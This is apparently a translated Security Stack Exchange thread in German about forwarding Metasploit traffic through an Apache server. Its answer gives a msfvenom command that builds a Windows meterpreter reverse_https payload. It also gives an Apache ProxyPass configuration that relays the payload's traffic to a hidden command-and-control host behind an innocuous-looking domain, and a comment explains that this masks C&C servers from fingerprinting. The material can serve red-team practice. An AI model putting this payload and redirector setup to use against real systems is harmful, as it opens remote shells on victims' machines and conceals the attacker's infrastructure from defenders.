Leiten Sie Metasploit-Anforderungen an eine andere IP-Adresse weiter

410

Ich möchte zu Hause einen statischen Apache-Webserver einrichten, der alle eingehenden Metasploit-Verbindungen an eine andere IP weiterleitet. Ist das möglich? Wenn das so ist, wie? Ich möchte den Apache-Server auf einem RasPi B + ausführen, wenn dies hilft.

1
Willkommen bei der Security SE! Können Sie uns mehr Informationen über das geben, was Sie erreichen wollen? multithr3at3d vor 6 Jahren 4
Aufbauend auf dem Kommentar @ multithr3at3d, ist nicht klar, was Sie versuchen. Apache ist ein Webserver und kann nur den Web-Verkehr auf den jeweiligen Port umleiten, so dass nicht alle "Metasploit-Verbindungen" an Remote-Hosts weitergeleitet werden können. Wenn Sie jedoch die Metasploit-Webbenutzeroberfläche ausgeführt haben und einfach den Webdatenverkehr an einen anderen Webserver senden möchten, würde ich die Verwendung eines Nginx-Reverseproxy empfehlen. SuperAdmin vor 6 Jahren 0
@schroeder Nicht an dieser Stelle, aber normalerweise ist ein gültiger Apache- oder Nginx-Server für zwei Zwecke vorkonfiguriert: Zum Weiterleiten von Anforderungen separater Kampagnen an separate C & C-Server und zum Maskieren der Anforderungen als legitime HTTP-Server, um Fingerabdrücke zu vermeiden. vor 6 Jahren 0
@void_in yeah, der Fingerabdruckwinkel macht eigentlich sehr viel Sinn schroeder vor 6 Jahren 0

1 Antwort auf die Frage

2
void_in

Erstellen Sie zuerst die Nutzdaten:

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe 

Der wichtigste Teil ist der LURI, den Sie für eine bestimmte Ressource festlegen müssen. Der gesamte von der Nutzlast erzeugte Datenverkehr wird auf diesen URI gerichtet.

Wenn dies abgeschlossen ist, verwenden Sie die ProxyPass-Direktive in Apache oder nginx, um nur den Datenverkehr von / myawesomecnc an den gewünschten Host weiterzuleiten. Hier ist ein Beispiel für Apache:

<VirtualHost *:443>  ServerName www.totallyharmless.com ... ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/ ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/ ... </VirtualHost>